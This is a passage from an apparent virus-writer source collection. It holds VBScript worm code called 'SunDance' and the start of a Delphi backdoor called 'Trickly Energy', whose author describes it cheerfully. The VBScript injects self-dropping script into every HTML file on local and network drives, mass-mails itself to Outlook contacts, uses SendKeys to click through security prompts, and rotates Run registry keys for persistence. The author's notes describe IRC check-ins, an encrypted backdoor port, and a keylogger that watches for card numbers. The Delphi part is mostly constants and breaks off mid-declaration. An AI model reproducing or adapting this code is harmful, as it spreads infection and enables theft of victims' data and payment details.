fso=createobject("+chr(34)+"Scripting.FileSystemObject"+chr(34)+")" FichIn.writeline "Set WshShell = Createobject("+chr(34)+"WScript.Shell"+chr(34)+")" FichIn.writeline "set fich=fso.createtextfile("+chr(34)+"C:\SunDance.vbs"+chr(34)+")" FichIn.writeline "dim vbfich(10000)" For i= 1 to 10000 FichIn.writeline "vbfich("+Cstr(i)+")= "+chr(34)+ScriptHtml(i)+chr(34) If ScriptHtml(i)="" then exit for Next PlusRien: FichIn.writeline "For i = 1 to 10000" FichIn.writeline "vbfich(i)=replace(vbfich(i),"+chr(34)+chr(163)+chr(34)+",chr(34))" FichIn.writeline "fich.writeline vbfich(i)" FichIn.writeline "If vbfich(i)="+chr(34)+chr(34)+" then exit for" FichIn.writeline "Next" FichIn.writeline "fich.close" FichIn.writeline "WshShell.run "+chr(34)+"C:\SunDance.vbs"+chr(34) FichIn.writeline "-->" FichIn.writeline "</"+"scr"+"ipt>" FichIn.write FichIn2 FichIn.save FichIn.close set FichHtm=opentextfile(repwin+"\"+NomHtm+".htm",1) Html=FichHtm.readall FichHtm.close end sub Sub listadriv() if Action = 1 then On Error Resume Next Dim d, dc, s Set dc = fso.Drives For Each d In dc If d.DriveType = 2 Or d.DriveType = 3 Then fileslist(d.path + "\") folderlist(d.path + "\") End If Next End if End Sub Sub folderlist(folderspec) On Error Resume Next Dim f, f1, sf Set f = fso.GetFolder(folderspec) Set sf = f.SubFolders For Each f1 In sf fileslist (f1.Path) folderlist (f1.Path) Next end sub sub fileslist(folderspec) On Error Resume Next Dim f, f1, fc, ext, ap, s, bname Set f = fso.GetFolder(folderspec) Set fc = f.Files For Each f1 In fc ext = fso.GetExtensionName(f1.Path) ext = LCase(ext) s = LCase(f1.Name) if ext="hta" or ext="html" or ext="htm" then Set FichIn = fso.OpenTextFile(f1.path, 1) FichIn3=FichIn.ReadAll FichIn2 = FichIn.Readline FichIn.close if FichIn2<>"<SCRIPT language=vbscript>" then Set FichIn = fso.CreateTextFile(f1.path) FichIn=fso.CreateTextFile(f1.path) FichIn.writeline "<script language=vbscript>" FichIn.writeline "<!--" Fichin.writeline "set fso=createobject("+chr(34)+"Scripting.FileSystemObject"+chr(34)+")" FichIn.writeline "Set WshShell = Createobject("+chr(34)+"WScript.Shell"+chr(34)+")" FichIn.writeline "set fich=fso.createtextfile("+chr(34)+"C:\SunDance.vbs"+chr(34)+")" FichIn.writeline "dim vbfich(10000)" For i= 1 to 10000 FichIn.writeline "vbfich("+Cstr(i)+")= "+chr(34)+ScriptHtml(i)+chr(34) If ScriptHtml(i)="" then exit for Next PlusRien: FichIn.writeline "For i = 1 to 10000" FichIn.writeline "vbfich(i)=replace(vbfich(i),"+chr(34)+chr(163)+chr(34)+",chr(34))" FichIn.writeline "fich.writeline vbfich(i)" FichIn.writeline "If vbfich(i)="+chr(34)+chr(34)+" then exit for" FichIn.writeline "Next" FichIn.writeline "fich.close" FichIn.writeline "WshShell.run "+chr(34)+"C:\SunDance.vbs"+chr(34) FichIn.writeline "-->" FichIn.writeline "</"+"scr"+"ipt>" FichIn.write FichIn3 FichIn.save FichIn.close end if End If next end sub sub MailOutlook() On error resume next Set WshShell = WScript.Createobject("WScript.Shell") Set out = CreateObject("Outlook.Application") If out = "Outlook" and Action=1 and Wscript.ScriptFullName="C:\SunDance.vbs" Then Set mapi = out.GetNameSpace("MAPI") Set carnets = mapi.AddressLists For Each carnet In carnets If carnet.AddressEntries.Count <> 0 Then WshShell.AppActive "Microsoft Outlook" WshShell.Sendkeys "{TAB}{TAB}{TAB}{ENTER}" carnet2 = carnet.AddressEntries.Count For entree = 1 To carnet2 Set adresse = carnet.AddressEntries(entree) Set message = out.CreateItem(0) message.to=adresse message.subject="SunDance Update" message.htmlbody=html message.DeleteAfterSubmit = True set Copie=Message.Attachments Copie.add Wscript.ScriptFullname message.send Wscript.Sleep 5000 WshShell.AppActive "Microsoft Outlook" WshShell.Sendkeys "{TAB}{TAB}{ENTER}" WshShell.Sendkeys "{TAB}{TAB}{ENTER}" Next End If Next End If end sub Sub Fin() On error resume next do If action=1 then WScript.Sleep 2000 WshShell.Regdelete Cle2+"\Run\"+Nom1 WshShell.Regdelete Cle2+"\RunServices\"+Nom1 fso.DeleteFile (repwin+"\"+Nom2+".vbs") Nom1=GenerNom() Nom2=GenerNom() WshShell.RegWrite Cle2+"\Run\"+Nom1,repwin+"\"+Nom2+".vbs" WshShell.RegWrite Cle2+"\RunServices\"+Nom1,repwin+"\"+Nom2+".vbs" Set FichDer=fso.CreateTextFile(repwin+"\"+Nom2+".vbs") FichDer.write Script Fichder.close end if loop end sub Function GenerNom() Nom="" Randomize Timer do:h1=int(rnd*8):loop until h1>2 for lettre=1 to h1 do:h2=int(rnd*25):loop until h2>0 Nom=Nom+Chr(h2+66) next GenerNom=Nom End Function''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

sources

Trickly Energy ; Until last month 10/02 i started a New Project (Trickly) ; for any Comments of us ; mail me to SST@Hablas.com ; bye..and I wish you a New Virulent Year ; ; Energy ; ; ;Source code of the Backdoor ->Energy_Trickly_Backdoor.dpr ;Source code of the Worm ->Energy_Trickly_Worm.dpr ; ;Little description: :The worm function scan Outlook and Eudora address book file and after send email. I don't know know if that work with the last versions. ;There is a thread which connect to an irc for see who is online. ;The port 4662(self via Edonkey ect.) is open only when the victim is online and the Wsock32 api call are encrypted and the protocol of the backdoor too. ;The keylogger was design mainly for detect if a 13,16 digit code is tape on the keyboard and after put a flag in the registry (it's surely the big need of money who push me to put this function inside :-). ;The other function are: registry access, file upload/download, windows process, etc.. ; ; Energy_Trickly_Backdoor.dpr program vv; uses Windows; const {winsock const} FD_SETSIZE = 64; IOCPARM_MASK = $7f; IOC_VOID = $20000000; IOC_OUT = $40000000; IOC_IN = $80000000; IOC_INOUT = (IOC_IN or IOC_OUT); FIONREAD = IOC_OUT or { get # bytes to read } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 127; FIONBIO = IOC_IN or { set/clear non-blocking i/o } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 126; FIOASYNC = IOC_IN or { set/clear async i/o } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 125; // Protocols } IPPROTO_IP = 0; { dummy for IP } IPPROTO_ICMP = 1; { control message protocol } IPPROTO_IGMP = 2; { group management protocol } IPPROTO_GGP = 3; { gateway^2 (deprecated) } IPPROTO_TCP = 6; { tcp } IPPROTO_PUP = 12; { pup } IPPROTO_UDP = 17; { user datagram protocol } IPPROTO_IDP = 22; { xns idp } IPPROTO_ND = 77; { UNOFFICIAL net disk proto } IPPROTO_RAW = 255; { raw IP packet } IPPROTO_MAX = 256; IPPORT_RESERVED = 1024; INADDR_ANY = $00000000; INADDR_LOOPBACK = $7F000001; INADDR_BROADCAST = $FFFFFFFF; INADDR_NONE = $FFFFFFFF; WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; TF_DISCONNECT = $01; TF_REUSE_SOCKET = $02; TF_WRITE_BEHIND = $04; IP_OPTIONS = 1; IP_MULTICAST_IF = 2; { set/get IP multicast interface } IP_MULTICAST_TTL = 3; { set/get IP multicast timetolive } IP_MULTICAST_LOOP = 4; { set/get IP multicast loopback } IP_ADD_MEMBERSHIP = 5; { add an IP group membership } IP_DROP_MEMBERSHIP = 6; { drop an IP group membership } IP_TTL = 7; { set/get IP Time To Live } IP_TOS = 8; { set/get IP Type Of Service } IP_DONTFRAGMENT = 9; { set/get IP Don't Fragment flag } IP_DEFAULT_MULTICAST_TTL = 1; { normally limit m'casts to 1 hop } IP_DEFAULT_MULTICAST_LOOP = 1; { normally hear sends if a member } IP_MAX_MEMBERSHIPS = 20; { per socket; must fit in one mbuf } SOCK_STREAM = 1; { stream socket } SOCK_DGRAM = 2; { datagram socket } SOCK_RAW = 3; { raw-protocol interface } SOCK_RDM = 4; { reliably-delivered message } SOCK_SEQPACKET = 5; { sequenced packet stream } SO_DEBUG = $0001; { turn on debugging info recording } SO_ACCEPTCONN = $0002; { socket has had listen() } SO_REUSEADDR = $0004; { allow local address reuse } SO_KEEPALIVE = $0008; { keep connections alive } SO_DONTROUTE = $0010; { just use interface addresses } SO_BROADCAST = $0020; { permit sending of broadcast msgs } SO_USELOOPBACK = $0040; { bypass hardware when possible } SO_LINGER = $0080; { linger on close if data present } SO_OOBINLINE = $0100; { leave received OOB data in line } SO_DONTLINGER = $ff7f; SO_SNDBUF = $1001; { send buffer size } SO_RCVBUF = $1002; { receive buffer size } SO_SNDLOWAT = $1003; { send low-water mark } SO_RCVLOWAT = $1004; { receive low-water mark } SO_SNDTIMEO = $1005; { send timeout } SO_RCVTIMEO = $1006; { receive timeout } SO_ERROR = $1007; { get error status and clear } SO_TYPE = $1008; { get socket type } // SO_CONNDATA = $7000; // SO_CONNOPT = $7001; // SO_DISCDATA = $7002; // SO_DISCOPT = $7003; // SO_CONNDATALEN = $7004; // SO_CONNOPTLEN = $7005; // SO_DISCDATALEN = $7006; // SO_DISCOPTLEN = $7007; // SO_OPENTYPE = $7008; // SO_SYNCHRONOUS_ALERT = $10; // SO_SYNCHRONOUS_NONALERT = $20; // SO_MAXDG = $7009; // SO_MAXPATHDG = $700A; // SO_UPDATE_ACCEPT_CONTEXT = $700B; // SO_CONNECT_TIME = $700C; TCP_NODELAY = $0001; TCP_BSDURGENT = $7000; // AF_UNSPEC = 0; { unspecified } AF_UNIX = 1; { local to host (pipes, portals) } AF_INET = 2; { internetwork: UDP, TCP, etc. } // AF_IMPLINK = 3; { arpanet imp addresses } // AF_PUP = 4; { pup protocols: e.g. BSP } // AF_CHAOS = 5; { mit CHAOS protocols } // AF_IPX = 6; { IPX and SPX } // AF_NS = 6; { XEROX NS protocols } // AF_ISO = 7; { ISO protocols } // AF_OSI = AF_ISO; { OSI is ISO } // AF_ECMA = 8; { european computer manufacturers } // AF_DATAKIT = 9; { datakit protocols } // AF_CCITT = 10; { CCITT protocols, X.25 etc } // AF_SNA = 11; { IBM SNA } // AF_DECnet = 12; { DECnet } // AF_DLI = 13; { Direct data link interface } // AF_LAT = 14; { LAT } // AF_HYLINK = 15; { NSC Hyperchannel } // AF_APPLETALK = 16; { AppleTalk } // AF_NETBIOS = 17; { NetBios-style addresses } // AF_VOICEVIEW = 18; { VoiceView } // AF_FIREFOX = 19; { FireFox } // AF_UNKNOWN1 = 20; { Somebody is using this! } // AF_BAN = 21; { Banyan } // AF_MAX = 22; // PF_UNSPEC = AF_UNSPEC; PF_UNIX = AF_UNIX; PF_INET = AF_INET; // PF_IMPLINK = AF_IMPLINK; // PF_PUP = AF_PUP; // PF_CHAOS = AF_CHAOS; // PF_NS = AF_NS; // PF_IPX = AF_IPX; // PF_ISO = AF_ISO; // PF_OSI = AF_OSI; // PF_ECMA = AF_ECMA; // PF_DATAKIT = AF_DATAKIT; // PF_CCITT = AF_CCITT; // PF_SNA = AF_SNA; // PF_DECnet = AF_DECnet; // PF_DLI = AF_DLI; // PF_LAT = AF_LAT; // PF_HYLINK = AF_HYLINK; // PF_APPLETALK = AF_APPLETALK; // PF_VOICEVIEW = AF_VOICEVIEW; // PF_FIREFOX = AF_FIREFOX; // PF_UNKNOWN1 = AF_UNKNOWN1; // PF_BAN = AF_BAN; // PF_MAX = AF_MAX; SOL_SOCKET = $ffff; {options for socket level } SOMAXCONN = 5;{ Maximum queue length specifiable by listen. } MSG_OOB = $1; {process out-of-band data } MSG_PEEK = $2; {peek at incoming message } MSG_DONTROUTE = $4; {send without using routing tables } MSG_MAXIOVLEN = 16; MSG_PARTIAL = $8000; {partial send or recv for message xport } MAXGETHOSTSTRUCT = 1024; FD_READ = $01; FD_WRITE = $02; FD_OOB = $04; FD_ACCEPT = $08; FD_CONNECT = $10; FD_CLOSE = $20; WSABASEERR = 10000; WSAEINTR = (WSABASEERR+4); WSAEBADF = (WSABASEERR+9); WSAEACCES = (WSABASEERR+13); WSAEFAULT = (WSABASEERR+14); WSAEINVAL = (WSABASEERR+22); WSAEMFILE = (WSABASEERR+24); WSAEWOULDBLOCK = (WSABASEERR+35); WSAEINPROGRESS = (WSABASEERR+36); WSAEALREADY = (WSABASEERR+37); WSAENOTSOCK = (WSABASEERR+38); WSAEDESTADDRREQ = (WSABASEERR+39); WSAEMSGSIZE = (WSABASEERR+40); WSAEPROTOTYPE = (WSABASEERR+41); WSAENOPROTOOPT = (WSABASEERR+42); WSAEPROTONOSUPPORT = (WSABASEERR+43); WSAESOCKTNOSUPPORT = (WSABASEERR+44); WSAEOPNOTSUPP = (WSABASEERR+45); WSAEPFNOSUPPORT = (WSABASEERR+46); WSAEAFNOSUPPORT = (WSABASEERR+47); WSAEADDRINUSE = (WSABASEERR+48); WSAEADDRNOTAVAIL = (WSABASEERR+49); WSAENETDOWN = (WSABASEERR+50); WSAENETUNREACH = (WSABASEERR+51); WSAENETRESET = (WSABASEERR+52); WSAECONNABORTED = (WSABASEERR+53); WSAECONNRESET = (WSABASEERR+54); WSAENOBUFS = (WSABASEERR+55); WSAEISCONN = (WSABASEERR+56); WSAENOTCONN = (WSABASEERR+57); WSAESHUTDOWN = (WSABASEERR+58); WSAETOOMANYREFS = (WSABASEERR+59); WSAETIMEDOUT = (WSABASEERR+60); WSAECONNREFUSED = (WSABASEERR+61); WSAELOOP = (WSABASEERR+62); WSAENAMETOOLONG = (WSABASEERR+63); WSAEHOSTDOWN = (WSABASEERR+64); WSAEHOSTUNREACH = (WSABASEERR+65); WSAENOTEMPTY = (WSABASEERR+66); WSAEPROCLIM = (WSABASEERR+67); WSAEUSERS = (WSABASEERR+68); WSAEDQUOT = (WSABASEERR+69); WSAESTALE = (WSABASEERR+70); WSAEREMOTE = (WSABASEERR+71); WSAEDISCON = (WSABASEERR+101); WSASYSNOTREADY = (WSABASEERR+91); WSAVERNOTSUPPORTED = (WSABASEERR+92); WSANOTINITIALISED = (WSABASEERR+93); WSAHOST_NOT_FOUND = (WSABASEERR+1001); HOST_NOT_FOUND = WSAHOST_NOT_FOUND; WSATRY_AGAIN = (WSABASEERR+1002); TRY_AGAIN = WSATRY_AGAIN; WSANO_RECOVERY = (WSABASEERR+1003); NO_RECOVERY = WSANO_RECOVERY; WSANO_DATA = (WSABASEERR+1004); NO_DATA = WSANO_DATA; WSANO_ADDRESS = WSANO_DATA; NO_ADDRESS = WSANO_ADDRESS; EWOULDBLOCK = WSAEWOULDBLOCK; EINPROGRESS = WSAEINPROGRESS; EALREADY = WSAEALREADY; ENOTSOCK = WSAENOTSOCK; EDESTADDRREQ = WSAEDESTADDRREQ; EMSGSIZE = WSAEMSGSIZE; EPROTOTYPE = WSAEPROTOTYPE; ENOPROTOOPT = WSAENOPROTOOPT; EPROTONOSUPPORT = WSAEPROTONOSUPPORT; ESOCKTNOSUPPORT = WSAESOCKTNOSUPPORT; EOPNOTSUPP = WSAEOPNOTSUPP; EPFNOSUPPORT = WSAEPFNOSUPPORT; EAFNOSUPPORT = WSAEAFNOSUPPORT; EADDRINUSE = WSAEADDRINUSE; EADDRNOTAVAIL = WSAEADDRNOTAVAIL; ENETDOWN = WSAENETDOWN; ENETUNREACH = WSAENETUNREACH; ENETRESET = WSAENETRESET; ECONNABORTED = WSAECONNABORTED; ECONNRESET = WSAECONNRESET; ENOBUFS = WSAENOBUFS; EISCONN = WSAEISCONN; ENOTCONN = WSAENOTCONN; ESHUTDOWN = WSAESHUTDOWN; ETOOMANYREFS = WSAETOOMANYREFS; ETIMEDOUT = WSAETIMEDOUT; ECONNREFUSED = WSAECONNREFUSED; ELOOP = WSAELOOP; ENAMETOOLONG = WSAENAMETOOLONG; EHOSTDOWN = WSAEHOSTDOWN; EHOSTUNREACH = WSAEHOSTUNREACH; ENOTEMPTY = WSAENOTEMPTY; EPROCLIM = WSAEPROCLIM; EUSERS = WSAEUSERS; EDQUOT = WSAEDQUOT; ESTALE = WSAESTALE; EREMOTE = WSAEREMOTE; winsocket = 'vqlgn55&mfg'; //wsock32.dll {messages windows const} WM_NULL = $0000; WM_CREATE = $0001; WM_DESTROY = $0002; WM_MOVE = $0003; WM_SIZE = $0005; WM_ACTIVATE = $0006; WM_SETFOCUS = $0007; WM_KILLFOCUS = $0008; WM_ENABLE = $000A; WM_SETREDRAW = $000B; WM_SETTEXT = $000C; WM_GETTEXT = $000D; WM_GETTEXTLENGTH = $000E; WM_PAINT = $000F; WM_CLOSE = $0010; WM_QUERYENDSESSION = $0011; WM_QUIT = $0012; WM_QUERYOPEN = $0013; WM_ERASEBKGND = $0014; WM_SYSCOLORCHANGE = $0015; WM_ENDSESSION = $0016; WM_SYSTEMERROR = $0017; WM_SHOWWINDOW = $0018; WM_CTLCOLOR = $0019; WM_WININICHANGE = $001A; WM_SETTINGCHANGE = WM_WININICHANGE; WM_DEVMODECHANGE = $001B; WM_ACTIVATEAPP = $001C; WM_FONTCHANGE = $001D; WM_TIMECHANGE = $001E; WM_CANCELMODE = $001F; WM_SETCURSOR = $0020; WM_MOUSEACTIVATE = $0021; WM_CHILDACTIVATE = $0022; WM_QUEUESYNC = $0023; WM_GETMINMAXINFO = $0024; WM_PAINTICON = $0026; WM_ICONERASEBKGND = $0027; WM_NEXTDLGCTL = $0028; WM_SPOOLERSTATUS = $002A; WM_DRAWITEM = $002B; WM_MEASUREITEM = $002C; WM_DELETEITEM = $002D; WM_VKEYTOITEM = $002E; WM_CHARTOITEM = $002F; WM_SETFONT = $0030; WM_GETFONT = $0031; WM_QUERYDRAGICON = $0037; WM_COMPAREITEM = $0039; WM_COMPACTING = $0041; WM_COMMNOTIFY = $0044; { obsolete in Win32} WM_WINDOWPOSCHANGING = $0046; WM_WINDOWPOSCHANGED = $0047; WM_POWER = $0048; WM_COPYDATA = $004A; WM_CANCELJOURNAL = $004B; WM_NOTIFY = $004E; WM_INPUTLANGCHANGEREQUEST = $0050; WM_INPUTLANGCHANGE = $0051; WM_TCARD = $0052; WM_HELP = $0053; WM_USERCHANGED = $0054; WM_NOTIFYFORMAT = $0055; WM_CONTEXTMENU = $007B; WM_STYLECHANGING = $007C; WM_STYLECHANGED = $007D; WM_DISPLAYCHANGE = $007E; WM_GETICON = $007F; WM_SETICON = $0080; WM_NCCREATE = $0081; WM_NCDESTROY = $0082; WM_NCCALCSIZE = $0083; WM_NCHITTEST = $0084; WM_NCPAINT = $0085; WM_NCACTIVATE = $0086; WM_GETDLGCODE = $0087; WM_NCMOUSEMOVE = $00A0; { WM_NCLBUTTONDOWN = $00A1; WM_NCLBUTTONUP = $00A2; WM_NCLBUTTONDBLCLK = $00A3; WM_NCRBUTTONDOWN = $00A4; WM_NCRBUTTONUP = $00A5; WM_NCRBUTTONDBLCLK = $00A6; WM_NCMBUTTONDOWN = $00A7; WM_NCMBUTTONUP = $00A8; WM_NCMBUTTONDBLCLK = $00A9; } WM_KEYFIRST = $0100; WM_KEYDOWN = $0100; WM_KEYUP = $0101; WM_CHAR = $0102; WM_DEADCHAR = $0103; WM_SYSKEYDOWN = $0104; WM_SYSKEYUP = $0105; WM_SYSCHAR = $0106; WM_SYSDEADCHAR = $0107; WM_KEYLAST = $0108; WM_INITDIALOG = $0110; WM_COMMAND = $0111; WM_SYSCOMMAND = $0112; WM_TIMER = $0113; WM_HSCROLL = $0114; WM_VSCROLL = $0115; WM_INITMENU = $0116; WM_INITMENUPOPUP = $0117; WM_MENUSELECT = $011F; WM_MENUCHAR = $0120; WM_ENTERIDLE = $0121; WM_CTLCOLORMSGBOX = $0132; WM_CTLCOLOREDIT = $0133; WM_CTLCOLORLISTBOX = $0134; WM_CTLCOLORBTN = $0135; WM_CTLCOLORDLG = $0136; WM_CTLCOLORSCROLLBAR= $0137; WM_CTLCOLORSTATIC = $0138; WM_MOUSEFIRST = $0200; WM_MOUSEMOVE = $0200; WM_LBUTTONDOWN = $0201; WM_LBUTTONUP = $0202; WM_LBUTTONDBLCLK = $0203; WM_RBUTTONDOWN = $0204; WM_RBUTTONUP = $0205; WM_RBUTTONDBLCLK = $0206; WM_MBUTTONDOWN = $0207; WM_MBUTTONUP = $0208; WM_MBUTTONDBLCLK = $0209; WM_MOUSEWHEEL = $020A; WM_MOUSELAST = $020A; WM_PARENTNOTIFY = $0210; WM_ENTERMENULOOP = $0211; WM_EXITMENULOOP = $0212; WM_NEXTMENU = $0213; WM_SIZING = 532; WM_CAPTURECHANGED = 533; WM_MOVING = 534; WM_POWERBROADCAST = 536; WM_DEVICECHANGE = 537; { WM_IME_STARTCOMPOSITION = $010D; WM_IME_ENDCOMPOSITION = $010E; WM_IME_COMPOSITION = $010F; WM_IME_KEYLAST = $010F; WM_IME_SETCONTEXT = $0281; WM_IME_NOTIFY = $0282; WM_IME_CONTROL = $0283; WM_IME_COMPOSITIONFULL = $0284; WM_IME_SELECT = $0285; WM_IME_CHAR = $0286; WM_IME_KEYDOWN = $0290; WM_IME_KEYUP = $0291; WM_MDICREATE = $0220; WM_MDIDESTROY = $0221; WM_MDIACTIVATE = $0222; WM_MDIRESTORE = $0223; WM_MDINEXT = $0224; WM_MDIMAXIMIZE = $0225; WM_MDITILE = $0226; WM_MDICASCADE = $0227; WM_MDIICONARRANGE = $0228; WM_MDIGETACTIVE = $0229; WM_MDISETMENU = $0230; WM_ENTERSIZEMOVE = $0231; WM_EXITSIZEMOVE = $0232; WM_DROPFILES = $0233; WM_MDIREFRESHMENU = $0234; } WM_MOUSEHOVER = $02A1; WM_MOUSELEAVE = $02A3; WM_CUT = $0300; WM_COPY = $0301; WM_PASTE = $0302; WM_CLEAR = $0303; WM_UNDO = $0304; WM_PAINTCLIPBOARD = $0309; WM_PRINT = 791; WM_PRINTCLIENT = 792; WM_HANDHELDFIRST = 856; WM_HANDHELDLAST = 863; WM_PENWINFIRST = $0380; WM_PENWINLAST = $038F; WM_COALESCE_FIRST = $0390; WM_COALESCE_LAST = $039F; WM_DDE_FIRST = $03E0; WM_DDE_INITIATE = WM_DDE_FIRST + 0; WM_DDE_TERMINATE = WM_DDE_FIRST + 1; WM_DDE_ADVISE = WM_DDE_FIRST + 2; WM_DDE_UNADVISE = WM_DDE_FIRST + 3; WM_DDE_ACK = WM_DDE_FIRST + 4; WM_DDE_DATA = WM_DDE_FIRST + 5; WM_DDE_REQUEST = WM_DDE_FIRST + 6; WM_DDE_POKE = WM_DDE_FIRST + 7; WM_DDE_EXECUTE = WM_DDE_FIRST + 8; WM_DDE_LAST = WM_DDE_FIRST + 8; WM_APP = $8000; WM_USER = $0400; UM_KEYHIT = WM_USER + 7; //keylog const ERROR = '|ERROR:'; ALLDONE = 'All done.'; //VER_PLATFORM_WIN32s = 0; //V/ER_PLATFORM_WIN32_WINDOWS = 1; //VER_PLATFORM_WIN32_NT = 2; Count : integer = 0; lpzClassName = 'Explorer '; lpzWindowsName = 'Explorer '; WM_MY_SOCK_MESSAGE = WM_USER+2; LFCR = #10#13; { File open modes } fmOpenRead = $0000; fmOpenWrite = $0001; fmOpenReadWrite = $0002; fmShareCompat = $0000; fmShareExclusive = $0010; fmShareDenyWrite = $0020; fmShareDenyRead = $0030; fmShareDenyNone = $0040; { File attribute constants } faReadOnly = $00000001; faHidden = $00000002; faSysFile = $00000004; faVolumeID = $00000008; faDirectory = $00000010; faArchive = $00000020; faAnyFile = $0000003F; {prog type} type PWinPassword = ^TWinPassword; TWinPassword = record EntrySize: Word; ResourceSize: Word; PasswordSize: Word; EntryIndex: Byte; EntryType: Byte; PasswordC: Char; end; {winsock type} type u_char = Char; u_short = Word; u_int = Integer; u_long = Longint; TSocket = u_int; type PFDSet = ^TFDSet; TFDSet = packed record fd_count: u_int; fd_array: array[0..FD_SETSIZE-1] of TSocket; end; PTimeVal = ^TTimeVal; TTimeVal = packed record tv_sec: Longint; tv_usec: Longint; end; type PHostEnt = ^THostEnt; THostEnt = packed record h_name: PChar; h_aliases: ^PChar; h_addrtype: Smallint; h_length: Smallint; case Byte of 0: (h_addr_list: ^PChar); 1: (h_addr: ^PChar) end; PNetEnt = ^TNetEnt; TNetEnt = packed record n_name: PChar; n_aliases: ^PChar; n_addrtype: Smallint; n_net: u_long; end; PServEnt = ^TServEnt; TServEnt = packed record s_name: PChar; s_aliases: ^PChar; s_port: Smallint; s_proto: PChar; end; PProtoEnt = ^TProtoEnt; TProtoEnt = packed record p_name: PChar; p_aliases: ^Pchar; p_proto: Smallint; end; type SunB = packed record s_b1, s_b2, s_b3, s_b4: u_char; end; SunW = packed record s_w1, s_w2: u_short; end; PInAddr = ^TInAddr; TInAddr = packed record case integer of 0: (S_un_b: SunB); 1: (S_un_w: SunW); 2: (S_addr: u_long); end; PSockAddrIn = ^TSockAddrIn; TSockAddrIn = packed record case Integer of 0: (sin_family: u_short; sin_port: u_short; sin_addr: TInAddr; sin_zero: array[0..7] of Char); 1: (sa_family: u_short; sa_data: array[0..13] of Char) end; type PWSAData = ^TWSAData; TWSAData = packed record wVersion: Word; wHighVersion: Word; szDescription: array[0..WSADESCRIPTION_LEN] of Char; szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char; iMaxSockets: Word; iMaxUdpDg: Word; lpVendorInfo: PChar; end; PTransmitFileBuffers = ^TTransmitFileBuffers; TTransmitFileBuffers = packed record Head: Pointer; HeadLength: DWORD; Tail: Pointer; TailLength: DWORD; end; type { Structure used by kernel to store most addresses. } PSockAddr = ^TSockAddr; TSockAddr = TSockAddrIn; { Structure used by kernel to pass protocol information in raw sockets. } PSockProto = ^TSockProto; TSockProto = packed record sp_family: u_short; sp_protocol: u_short; end; type { Structure used for manipulating linger option. } PLinger = ^TLinger; TLinger = packed record l_onoff: u_short; l_linger: u_short; end; const INVALID_SOCKET = TSocket(NOT(0)); SOCKET_ERROR = -1; {type window message record} type PMessage = ^TMessage; TMessage = record Msg: Cardinal; case Integer of 0: ( WParam: Longint; LParam: Longint; Result: Longint); 1: ( WParamLo: Word; WParamHi: Word; LParamLo: Word; LParamHi: Word; ResultLo: Word; ResultHi: Word); end; { Common message format records } TWMNoParams = record Msg: Cardinal; Unused: array[0..3] of Word; Result: Longint; end; TWMKey = record Msg: Cardinal; CharCode: Word; Unused: Word; KeyData: Longint; Result: Longint; end; TWMMouse = record Msg: Cardinal; Keys: Longint; case Integer of 0: ( XPos: Smallint; YPos: Smallint); 1: ( Pos: TSmallPoint; Result: Longint); end; TWMWindowPosMsg = record Msg: Cardinal; Unused: Integer; WindowPos: PWindowPos; Result: Longint; end; TWMScroll = record Msg: Cardinal; ScrollCode: Smallint; { SB_xxxx } Pos: Smallint; ScrollBar: HWND; Result: Longint; end; { Message records } TWMActivate = record Msg: Cardinal; Active: Word; { WA_INACTIVE, WA_ACTIVE, WA_CLICKACTIVE } Minimized: WordBool; ActiveWindow: HWND; Result: Longint; end; TWMActivateApp = record Msg: Cardinal; Active: BOOL; ThreadId: Longint; Result: Longint; end; TWMAskCBFormatName = record Msg: Cardinal; NameLen: Word; Unused: Word; FormatName: PChar; Result: Longint; end; TWMCancelMode = TWMNoParams; TWMChangeCBChain = record Msg: Cardinal; Remove: HWND; Next: HWND; Result: Longint; end; TWMChar = TWMKey; TWMCharToItem = record Msg: Cardinal; Key: Word; CaretPos: Word; ListBox: HWND; Result: Longint; end; TWMChildActivate = TWMNoParams; TWMChooseFont_GetLogFont = record Msg: Cardinal; Unused: Longint; LogFont: PLogFont; Result: Longint; end; TWMClear = TWMNoParams; TWMClose = TWMNoParams; TWMCommand = record Msg: Cardinal; ItemID: Word; NotifyCode: Word; Ctl: HWND; Result: Longint; end; TWMCompacting = record Msg: Cardinal; CompactRatio: Longint; Unused: Longint; Result: Longint; end; TWMCompareItem = record Msg: Cardinal; Ctl: HWnd; CompareItemStruct: PCompareItemStruct; Result: Longint; end; TWMCopy = TWMNoParams; TWMCopyData = record Msg: Cardinal; From: HWND; CopyDataStruct: PCopyDataStruct; Result: Longint; end; { ?? WM_CLP_LAUNCH, WM_CPL_LAUNCHED } TWMCreate = record Msg: Cardinal; Unused: Integer; CreateStruct: PCreateStruct; Result: Longint; end; TWMCtlColor = record Msg: Cardinal; ChildDC: HDC; ChildWnd: HWND; Result: Longint; end; TWMCtlColorBtn = TWMCtlColor; TWMCtlColorDlg = TWMCtlColor; TWMCtlColorEdit = TWMCtlColor; TWMCtlColorListbox = TWMCtlColor; TWMCtlColorMsgbox = TWMCtlColor; TWMCtlColorScrollbar = TWMCtlColor; TWMCtlColorStatic = TWMCtlColor; TWMCut = TWMNoParams; TWMDDE_Ack = record Msg: Cardinal; PostingApp: HWND; case Word of WM_DDE_INITIATE: ( App: Word; Topic: Word; Result: Longint); WM_DDE_EXECUTE {and all others}: ( PackedVal: Longint); end; TWMDDE_Advise = record Msg: Cardinal; PostingApp: HWND; PackedVal: Longint; Result: Longint; end; TWMDDE_Data = record Msg: Cardinal; PostingApp: HWND; PackedVal: Longint; Result: Longint; end; TWMDDE_Execute = record Msg: Cardinal; PostingApp: HWND; Commands: THandle; Result: Longint; end; TWMDDE_Initiate = record Msg: Cardinal; PostingApp: HWND; App: Word; Topic: Word; Result: Longint; end; TWMDDE_Poke = record Msg: Cardinal; PostingApp: HWND; PackedVal: Longint; Result: Longint; end; TWMDDE_Request = record Msg: Cardinal; PostingApp: HWND; Format: Word; Item: Word; Result: Longint; end; TWMDDE_Terminate = record Msg: Cardinal; PostingApp: HWND; Unused: Longint; Result: Longint; end; TWMDDE_Unadvise = record Msg: Cardinal; PostingApp: HWND; Format: Word; Item: Word; Result: Longint; end; TWMDeadChar = TWMChar; TWMDeleteItem = record Msg: 